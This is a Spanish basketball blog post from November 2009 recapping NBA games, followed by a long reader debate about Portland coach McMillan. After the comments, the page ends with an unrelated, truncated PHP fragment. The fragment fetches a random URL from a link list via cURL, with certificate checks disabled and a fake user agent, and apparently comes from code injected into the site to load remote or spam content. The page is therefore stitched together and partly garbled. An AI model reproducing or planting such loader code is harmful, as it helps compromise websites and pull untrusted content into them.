La Crónica (18/11/2009)

19 de November de 2009 por TheDeerHunter

Hablábamos ayer de la eclosión de los Suns y hoy deberíamos hacer lo propio con la ascensión de los Hawks a la cabeza de la liga. Los Hawks alcanzaron el doble dígito de victorias basándose en el estilo propio que han patentado las últimas campañas: Defensa asfixiante a través de su potente froncourt, que anoche hizo naufragar al mismísimo Wade, y mientras Joe Johnson ajusticiando. Nadie en esta liga está capacitado para jugársela tranquilamente contra este equipo que, de momento, van primeros empatados con los Suns.

Mientras, los Cavs se encontraron ante una encerrona en Washington. Volvió Jamison, volvió Mike Miller. Con la enfermería vacía este equipo poco tiene que ver con el equipo abonado al “carabasas club”. En este caso, sin Shaq ni Varejao el duelo empezó a perderse desde dentro. La diferencia de rebotes se tornó sonrojante para un equipo que se considera candidato. LeBron estuvo demasiado solo ante el peligro que supone una de las plazas más hostiles hacia su figura de toda la liga.El resto de perseguidores sí cumplieron. Los Celtics no tuvieron que sudar demasiado para doblegar a los Warriors. Los Magic, sin su comandante Nelson para varias semanas, se vengaron de los Thunder. Los Bucks le endosaron la décimosegunda a los Nets a pesar de Douglas-Roberts y Terrence Williams. Y los Mavs tiraron del arcángel Nowitzki para tumbar en la prórroga a los Spurs. En un peldaño por debajo, los Blazers ganaron apuradamente a los Pistons, controlando bien a Ben Gordon y sin mucho más. Ese sí que es mérito de McMillan.

En la zona media los Sixers lograron recuperar, al menos por un partido, al Brand decisivo para sacar adelante un complicado partido ante Charlotte. Un tapón suyo en un final agónico, más una última canasta de Lou Williams certificaron el milagro. Menos problemas tuvieron los Rockets para vencer a los Wolves en un fantástico duelo Scola-Jefferson que ganó por puntos el argentino. Los Jazz dieron cuenta de los Raptors con un gran final de partido de Maynor y los Grizzlies ganaron a los Clippers con un Marc Gasol mayestático.

Por último, los mejores Pacers desde hace años se dejaron levantar en la segunda parte un partido que tenían bastante bien controlado, en casa contra los flojísimos Knicks. Ese es el problema del equipo de Indianápolis. Terrible inconsistencia.

PREMIOS

MVP: El alemán Dirk Nowitzki ha iniciado la temporada en un gran estado de forma. Si en el anterior partido le cascó 32 puntos a los Bucks ayer finiquitó a los Spurs con 41 puntos, 11 de ellos en la prórroga. Además tuvo tiempo de sumar 12 rebotes. A este nivel, ¿que importa que falten 3 de tus teóricos compañeros titulares?

Rookie: Jennings se queda sin el galardón de hoy a pesar de sus 18 puntos y 8 asistencias por sus 8 pérdidas de balón. En su lugar, nombres como el de Tyler Hansbrough (14 puntos, 5 rebotes), James Harden (24 puntos), Eric Maynor (15 puntos y 6 asistencias) y sobretodo Terrence Williams (20 puntos y 10 rebotes).

Sorpresa: Al Jefferson parece recuperarse poco a poco de la grave lesión que sufrió el año pasado y consiguió el segundo doble-doble de la temporada. Larry Hughes se quedó a una asistencia del triple-doble (y ahora suena que lo quieren cortar para traer a Iverson…). Delfino y Ridnour, con 21 y 17 puntos respectivamente, parece que se unen a la fiesta en los Bucks. Y finalmente, Ramon Sessions cuaja un buen partido en la derrota de su equipo frente los los Rockets.

Decepción: El escudero de Lebron James se marcó un 2 de 13 que le deja en muy mal lugar. 6 míseros puntos para Maurice Williams. Así los Cavs a ninguna parte.

Esfuerzo en vano: Extraño ver aparecer por aquí a Lebron James y Tim Duncan pero ayer sus compañeros no les acompañaron, sobretodo al primero. Algo más normal es ver a Chris Bosh (32 puntos y 17 rebotes) y el que está condenado este año es Chris Douglas-Roberts (31 puntos y 10 rebotes), de lo poquito que se salva hasta el momento en los Nets.

RAZONES PARA TRASNOCHAR

Como siempre los jueves, poquito pero de calidad. Auténtica delicatessen. A las 2h00 New Orleans recibe a los mejores Suns de los últimos tiempos en la revancha del partido de hace unos días en el que los de Arizona pasaron por encima de los de, hasta aquel momento, Byron Scott. Posiblemente la baja de Chris Paul condicionará el choque pero habrá que ver como reaccionan los jugadores de los Hornets heridos en su amor propio. Media hora más tarde será el turno de Utah y San Antonio. Ninguna de las dos franquicias ha empezado muy fuerte la temporada pero sus partidos tienen el gusto de los clásicos. Veremos si los Jazz pueden conseguir la primera victoria en el AT&T Center en más de una década. Y para acabar un Bulls-Lakers en el que podría reaparecer Pau Gasol. Mejor no perdérselo.

VIDEO

TOP-10 del día. No os perdáis la jugada número 2, prueba de la empanada total de los Nets.

Comenta

24 comentarios a esta entrada

  1. Óscar dice:
    #1

    Deer, claro que es mérito de un cuerpo técnico que un equipo encaje tan pocos puntos como está permitiendo Portland. El nivel defensivo es altísimo, de lo mejor de la Liga en este momento. Por lógica, el desgaste atrás se deja notar cuando se ataca, pero es un equipo cada vez más sólido.
    Cuando metió Rudy el triple tras sistema preparado para él (hasta Loncar se anotó la jugada en un papel)que forzó la prórroga vs. Atlanta, me acordé de todos los detractores de McMillan en cuanto al “roy-sistema”, lo previsible que es, etc. Lo curioso es que la acción no es una excepción, precisamente. En fin. Pena de no haber culminado con victoria…
    Los Spurs han empezado a su ritmo, como siempre. Pero que lleven balance negativo (4-5, 10º del Oeste) sorprende. Ya sabemos que hay que esperar a Febrero para verlos jugar de verdad…

      Citar

  2. sergio dice:
    #2

    Que duelo mas bonito el Duncan-Nowitzki de ayer… Estos dan el callo pase lo que pase. De los mejores jugadores de la decada. Ambos.

    Esta visto que aqui somos bipartidistas en cuanto a McMillan. Unos lo adoran… otros no lo podemos ni ver. Yo le doy todo el merito que tiene a McMillan y su defensa agobiante. Pero creo que tiene una de las mejores 4 plantillas de la liga y eso hay que aprovecharlo un poquito mas. Me recuerdan a los Philadelphia de Larry Brown que llegaron a la final, solo que ademas del cambio Iverson-Roy… los recursos ofensivos de Portland son infinitamente mayores. McKie, Snow, Tyrone Hill y George Lynch no eran precisamente Aldridge, Rudy, Webster, Outlaw, Batum, Blake y Miller. Eso si, con una pareja Ratliff-Mutombo por dentro no me acercaria yo al aro ni en los tiros libres.

    Parece que lo de Marc no es flor de un dia. Hoy 6 asistencias …. veremos hasta donde llega este chico.

      Citar

  3. sergio dice:
    #3

    Por cierto, Outlaw 5 meses fuera.

      Citar

  4. MagicJohnson32 dice:
    #4

    Se le abren las puertas de par en par a Rudy, ha tenido suerte porque no pintaba demasiado bien el inicio de temporada, y ya lo está aprovechando.

    Sensacional Marc, es un jugadorazo, el más inteligente de largo en esa plantilla, y se está ganando el respeto de la liga. Chapeau.

    Y sobre McMillan, yo no soy un gran fan, pero está buscando (y encontrando) soluciones más rápidamente y con más efectividad que la mayoría de entrenadores, muchos de los cuales viven y mueren encerrados en sus ideas.

      Citar

  5. TheDeerHunter dice:
    #5

    Oscar, varias cosas…
    Si hay algo que no he criticado de McMillan (hay que buscarlo, eso sí) es la defensa. Algo tiene que saber hacer, digo yo. Sin embargo, las cifras defensivas no siempre reflejan lo que un equipo es defensivamente. En concreto, McMillan juega a dormir a las cabras… y las posesiones se hacen tediosas. Eso seguramente debe de influir en la cantidad de puntos que mete y que recibe. Tanto para lo bueno como para lo malo.
    Dices que el nivel defensivo es altísimo, de los mejores de la liga. Contamos con los mismos argumentos para concluir que el nivel ofensivo es bajísimo, de los peores de la liga… y creo que con la configuración de la plantilla en la mano es bastante más antinatural lo segundo que lo primero. Pero no te preocupes, que pronto intentará potenciar que sea natural lo primero, largando a buenos jugadores a cambio de tener una legión de perros de presa sin talento, que es lo que abiertamente reconoce McMillan que quiere tener… muy al contrario del criterio que ha establecido Pritchard, por cierto.

    El equipo es sólido… habría que ver cuanto mérito tiene la defensa impuesta y cuanto la excelente plantilla que dispone. Pero eso es elucubrar. Lo que no lo es es que ahora mismo tiene a 4 equipos por delante, con Utah o San Antonio tirándoles el aliento en la nuca. Es decir, con un equipo reforzado y más experimentado está en peor situación que terminó la regular el año pasado. En mi opinión el calendario también ha sido muy generoso con ellos. No observo ninguna mejora en el juego… sino más bien me parece muy preocupante el nuevo sistema al que los resultados han justificado. Sigo diciendo que no es el camino para alcanzar los objetivos que debe plantearse este equipo. Y de la cantinela del “futuro” ya podremos ir comprobando que se trata de una completa falacia… pero eso ya lo iremos viendo.

    Comentabas la jugada para Rudy… pues efectivamente nos sorprendió a muchos. Es algo que algunos hacía tiempo que llevábamos pidiendo. De hecho no pasa nada por haber perdido ese partido y este es precísamente el momento para probar estas cosas. El año pasado las probó contra Houston en postemporada, jugándose la vida… y cayendo eliminado, lógicamente. Para mí sí es una excepción… no recuerdo ninguna jugada que no se haya jugado Roy además de esta. Y han sido muchas… hasta llegar el punto a que al pobre no le dejaban apenas ni tirar. Si eso no es previsiblidad, ya me dirás. En cualquier caso aplaudo que McMillan sepa corregir ciertos errores. Seré el primero en alegrarme si repite ese planteamiento en concreto.

      Citar

  6. TheDeerHunter dice:
    #6

    Magic, ¿no te has planteado que quizás haya otras soluciones además de meter a Blake en la rotación siempre por encima de jugadores sideralmente mejores que él y también mejor preparados para cumplir en la posición de escolta??
    Te digo yo que esa solución no aguanta una primera ronda. Y me mojo a 6 meses vista de la pretemporada.
    Ya hablaremos entonces.

      Citar

  7. Viva_Dirk dice:
    #7

    Lo de Marc empieza a ser muy gordo, ahora mismo en el Oeste solo Bynum y Kaman están haciendo mejores números que el en la posición de center. Se entiende bien con Zach y con OJ Mayo. Hay ahora mismo una generación de pivots ‘raros’ como Marc, B.Lopez y Hibbert sin mucho físico pero muy inteligentes y con mucha facilidad para definir cerca del aro.

    Par Rudy ha sido una suerte la lesión de Outlaw, porque lo que es su juego no presenta ninguna duda.

    En cuanto a McMillan, es un hecho que tiene al grupo bastante concienciado para defender, eso no creo que nadie lo niegue, pero no creo que sea tan dificil darle algo mas de versatilidad al ataque, mas aun cuando tienes un base como A.Miller.

      Citar

  8. kantonyo dice:
    #8

    Yo creo que es buena noticia lo de Outlaw para Portland, ya que McMillan no ha sabido pararle los pies, a mi me tenía desesperado (he contratado al brujo de Cristiano Ronaldo)….

    Respecto a McMillan, yo como aficionado a Blazers, estoy contento con su labor aunque considere que su juego es de los menos atractivos de la liga. Creo que está formando una base bastante sólida en el aspecto táctico y de asignación de roles en el equipo, y habrá que esperar que jugadores como LaMarcus, Rudy o Greg desarrollen su caracter y personalidad para poder aspirar a cotas mayores.

      Citar

  9. Óscar dice:
    #9

    Los datos hablan bien de McMillan y los Blazers, a pesar de que tiene que mejorar en porcentajes de tiro. No olvidemos que no podrán contar con Batum y Outlaw hasta maroz aprox. y que también con lesiones largas están los rookies Mills y Pendergraph:

    * Es el equipo de la NBA que menos rebotes permite a los rivales (37,45).
    * Es el 6º mejor equipo en tapones.
    * Es el mejor equipo (con diferencia) en cuanto a los porcentajes FG de los rivales: 41%
    * Y sobre todo, es el equipo que menos puntos encaja de toda la Liga: 87,09 (por delante de BOS, 2º).

    Si tenemos en cuenta además que compite en la Conferencia Oeste, no están nada mal los números, creo yo. Soy de los que pienso que en los deportes colectivos el 50% del juego es defensa. Pero si nos gusta el ataque, ahí están los Knicks y los Warriors… eso sí que son numerazos.

      Citar

  10. TheDeerHunter dice:
    #10

    En mi opinión, quitando a Spurs y Lakers, los Blazers podrían tener la 3ª mejor plantilla del Oeste. Estoy hablando en términos de talento que creo que es precísamente la virtud que le haría marcar diferencias.
    Los números, en el oeste y con un calendario bastante amable, no están mal… pero es que tampoco son la leche. Ahora mismo perderían la ventaja campo en primera ronda… si el objetivo es llegar a playoffs va muy bien, pero si es pasar de primera ronda la cosa no tiene tan buena pinta.

    No cuenta con Batum, ni con Outlaw hasta, como dices, marzo como mínimo… pero no es que McMillan les tuviera como pilares fundamentales de su proyecto. En ese sentido, no lo considero como una pérdida decisiva.

    Los datos defensivos que aportas, están muy bien, no digo que no. Pero excepto el del porcentaje son todos muy relativos. Tanto los rebotes como los puntos son datos directamente relacionados con el número de posesiones (que estando McMillan en el ajo ya te digo yo que no van a ser muchas) y el de los tapones no está tan relacionado con los sistemas defensivos del técnico como sí con el talento de los jugadores que tiene. Volvemos a lo mismo.

    Han perdido contra Denver, Houston y Atlanta (todos equipos de playoffs) y sus mayores logros han sido ganar a los Rockets mermados, a los Spurs mermados, a los Hornets mermados, a los Pistons mermados… y no perder contra los Thunder, Grizzlies, Wolves (por dos veces) y Bobcats. Objetivamente no es para sacar tanto pecho… y te diría que algo de los magníficos números que enarbolas también es consecuencia de esto.

    A mí no me gustan ni los Knicks, ni los Warriors… pero tampoco los Bobcats, cuya filosofía es mucho más parecida a la de los Blazers. Creo que no es demasiado pedir que este equipo juegue un poquito mejor como tampoco lo es el exigirle a McMillan un juego y unos resultados acordes al nivel de la plantilla y de la franquicia para la que trabaja.

      Citar

  11. Óscar dice:
    #11

    Y si tanta plantilla tiene POR y le sobran jugadores de calidad, ¿por qué en los análisis o en la porra nadie decía que había un súperequipo?. Los Blazers basan su juego en la defensa y en el físico, al ser un equipo joven y atlético. Un equipo que está construido por Kevin Pritchard, con esas premisas.
    McMillan está sentando las bases para que, a partir de esa idea, el equipo crezca, se sienta seguro y competitivo, y así poder mejorar cada vez más en ataque, y pueda luchar a medio y largo plazo con los mejores. Me parece el camino correcto. Y los datos son demasiado claros como para negar que hay un gran trabajo por detrás. Creo que se está gestando algo grande, pero es sólo una opinión mía.
    Que no haya nunca ninguna declaración extraña ni temas extradeportivos habla también muy bien del ambiente y de la cohesión del grupo, y por supuesto del entrenador. Y ese es otro aspecto distintivo respecto al común de equipos de la NBA… como para ser muy optimistas.

      Citar

  12. Óscar dice:
    #12

    Y que tenga ahora según tú la 3º mejor plantilla del Oeste (?) no tiene nada que ver con el entrenador? El mismo que hace 4/5 años recogió un equipo en ruinas que no pasaba de 20 victorias por temporada… Lo que dices, es todo relativo pero negar a unos lo que se destaca de otros, o decir que esas estadísticas son discutibles o todos los equipos con los que juegan están mermados… Pues vale.

      Citar

  13. Dantley2 dice:
    #13

    Nowitzki para mí MVP de lo que llevamos de temporada. Bosh y LeBron cerca, pero creo que el alemán está inmenso.

      Citar

  14. TheDeerHunter dice:
    #14

    A la primera pregunta, no sé lo que contestarán los demás… en mis análisis o en mi porra te respondo: porque los dirije McMillan

    En cuanto al resto… supongo que el tiempo nos dará y nos quitará razones a unos y a otros… pero hasta la fecha, el que Blake sea titular por delante de Miller primero, y ahora por delante de Rudy parecen dos burradas como un piano digan lo que digan los supuestos buenos resultados hasta la fecha.

      Citar

  15. TheDeerHunter dice:
    #15

    La configuración de la plantilla se la achaco a Pritchard.
    Lo que McMillan pinta ahí se refleja en que pedía en verano más músculo y trajerón a André Miller y lo intentaron con Turkoglu.

    Y Oscar… te repito que yo sí le reconozco algunas virtudes defensivas a McMillan (no muchas) Se puede leer en el artículo y, por ejemplo, cuando hablé de la defensa de Rudy en el Europeo. Al César lo que es del César.

      Citar

  16. sergio dice:
    #16

    Creo, al igual que DEER, que las estadisticas de mejor defensa y menos rebotes vienen de que sea el 3er equipo que menos posesiones realiza por partido. Solo detras de Detroit y Charlotte, que tienen el mismo ritmo que una marcha funebre. Si le doy valor al porcentaje de tiro de sus oponentes… pero lo veo como resultado de las piernas jovenes del equipo y los rivales a los que se han enfrentado hasta ahora. Ademas de que cada vez que les pasan del 45% en tiro… derrota asegurada. Ese tipo de partidos quizas pidan mas liberacion ofensiva….

    A mi me encanta la plantilla de Portland, y le deseo lo mejor. Por eso no me gusta McMillan. No creo que sea lo mas adecuado para su equipo. No se que pinta Blake de titular. Si busca defensa creo que Rudy es bastante mas intenso que el (casi 2 robos en 22 minutos) y mas intimidador por los brazos que tiene. En cuanto a porcentaje de tiro… echadle un ojo y vereis que Rudy tiene un 10% mas de acierto en tiros de campo y triples, fuerza mas personales, coloca mas tapones,…. y en menos minutos. Lo digo de Rudy porque lo tengo que defender, pero lo mismo pienso para Webster u Outlaw, que conste.

    Tambien he de reconocer que han empezado mejor de lo que creia y no tengo motivos nuevos para criticar a McMillan. Tan solo esperar acontecimientos. Seguro que acabamos hablando otra vez de esto.

    MVP antes para Nash que LeBron no Dantley2?

      Citar

  17. sergio dice:
    #17

    Por cierto…. he mirado lo de los porcentajes de tiro de los oponentes y 2º van los Lakers que no son perros de presa eeee. Y Portland 6º por la cola en porcentaje de tiro (de ellos vaya…)

      Citar

  18. pcerezo dice:
    #18

    Bonita discusión.
    Portland buen equipo defensivo pero a posesiones largas. Deberíamos mirar sobre total de posesiones donde andarían los Portland.
    Creo que McMillan no sabe a donde va. Lo de Blake no se explica, en serio, obcecarse con este jugador es no dejar crecer al equipo.

    En cuanto a superplantilla de Portland yo no lo tengo tan claro. Creo que es una muy buena plantilla pero las hay bastante mejores en la liga. Les veo llegando entre los 6-8 de su conferencia.

    Y el MVP sin duda entre “Robin Hood” (tremendo), Nash, Kobe, Carmelo y Lebron. Vaya quinteto.

    Ojito al pastizal que va a sacar en verano Joe Johnson. Gran jugador.
    Entrenador el año Adelman. Qué locura de tío. Qué merito con estos Rockets.

    Me están sorprendiendo muy gratamente los Mavericks buen trabajo de Carlyle (al César lo que es del César).

    Lanzo una pregunta, arrancarán los Spurs?

    Un saludo,
    Pablo

      Citar

  19. Love Denise dice:
    #19

    buen debate sobre mcmillan

    una pregunta….¿por qué siempre hay tan pocos partidos los jueves? motivos de tv, tradición? no lo sé.
    thank you al que me responda

      Citar

  20. pcerezo dice:
    #20

    Es una jornada con solo dos partidos de lujo creo que en abierto por la tele americana. Uno con horario del Este y otro con horario del oeste para que no se solapen.
    Es sin duda la mejor jornada para vivir en los states, una especie con el monday night de la nfl,

    Un saludo,
    Pablo

      Citar

  21. sergio dice:
    #21

    Todo esta pensado en las ligas americanas. Cada dia entre el Lunes y el Jueves (dias de mas espectadores en “prime time”) le corresponde a cada una de las 4 ligas mas potentes de EEUU: MLB, NHL, NBA y NFL. Los jueves son para la NBA y suelen poner partidos a priori interesantes. Esta noche hubiese sido un Nash-Paul. Tambien hay dias importantes como los partidos de Navidad (creo que en ese dia el año pasado fue un Boston-Lakers o similar, y este año Boston-Orlando y Lakers-Cavs) o el dia de Marthin Luther King donde juegan todos o casi todos los equipos.

    Muy interesante el articulo de la NBA sobre las defensas de algunos equipos. http://www.nba.com/2009/news/features/john_schuhmann/11/19/numbersgame.battier/index.html?ls=iref:nbahpt1 y muy bonita la camiseta de Abdul-Jabbar en la foto de la pagina de la NBA. A ver si esta disponible en la tienda…

      Citar

  22. toni dice:
    #22

    Buen articulo Sergio, hablando de los ositos, he leido que hay un blog que cita que Marc sea jugador franquicia, ¿se estan viniendo arriba? ¿qué pensais?
    La camiseta espectacular pero creo que optare por una con un 3 menos. A pesar de las 8 perdidas de hoy…
    Esta hecho un fenomeno el chabal.

    Del tema McMillan, a mi tampoco me gusta pero ayer Blake 17pts y hasta con buenos porcentajes. Rudy debe aprovechar estos 5 meses al máximo. Probablemente se juegue mas que ganarle minutos a Outlaw o Batum.

      Citar

  23. Óscar dice:
    #23

    Hay una cosa que no entiendo: se relativiza la calidad de las estadísticas defensivas de Portland porque juega a pocas posesiones, a posesiones largas.
    Pero, si lo piesas, eso quiere decir algo que habla mucho mejor todavía del equipo que los propios números: tiene el control del juego, del ritmo de partido, obliga a los equipos contrarios a jugar como le conviene, propiciando a través de la defensa que sus rivales no jueguen nada fluídos y tengan porcentajes muy bajos (el mejor de la NBA en ese aspecto).
    Un equipo hace sobre la cancha (ofensivo) lo que le permite el rival (defensivo), y viceversa. En ese aspecto, Portland es un gran equipo, y si ves los partidos (poco “vistosos” en ocasiones, aunque para mí muy bien jugados tácticamente), te das cuenta. Lo mejor para mí es que hay una idea, un plan. Eso siempre es el primer paso, el más importante. En ese sentido, yo también disfruto viendo a estos Suns, que tienen un estilo de juego diferente, pero las ideas muy claras.

    No sé, será por carácter, pero a mi me gusta tanto esto que me quedo con lo bueno de cada uno antes que destacar lo malo de lo que me gusta menos… Y repito, a McMillan se le tiene cruzado en España porque no le daba minutos (mentira) a un jugador que tenía todo por demostrar… y que ya vemos lo que está jugando en un equipo que se decía estaba hecho a su medida, y con tres años más de experiencia…

      Citar

  24. Love Denise dice:
    #24

    totalmente de acuerdo con oscar en algunos aspectos, como que en España se el critica a veces por lo de ese jugador canario que no ha demostrado nada todavía, también de acuerdo con que los Blazers hacen que el rival juegue como ellos quieren, haciendo partidos feos, enmarañados y pocos vistosos para el espectador, pero que a ellos les viene muy bien. Yo, cuando critico a mcmillan, lo hago porque creo que se le puede sacar mas provecho a la pedazo plantilla y jugadores que tiene, a veces se empecina en poner siempre a los mismos (mira el caso de blake), jugar a lo mismo (dasela a roy y que los demas se aparten), y no exprimir al máximo las vurtudes de sus jugadores, vease frye saliendose en suns y discriminado por mcmilan, rudy se limita a tirar triples, sabiendo hace mucha más cosas, andre miller no se parece al de los últimos años, etc…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>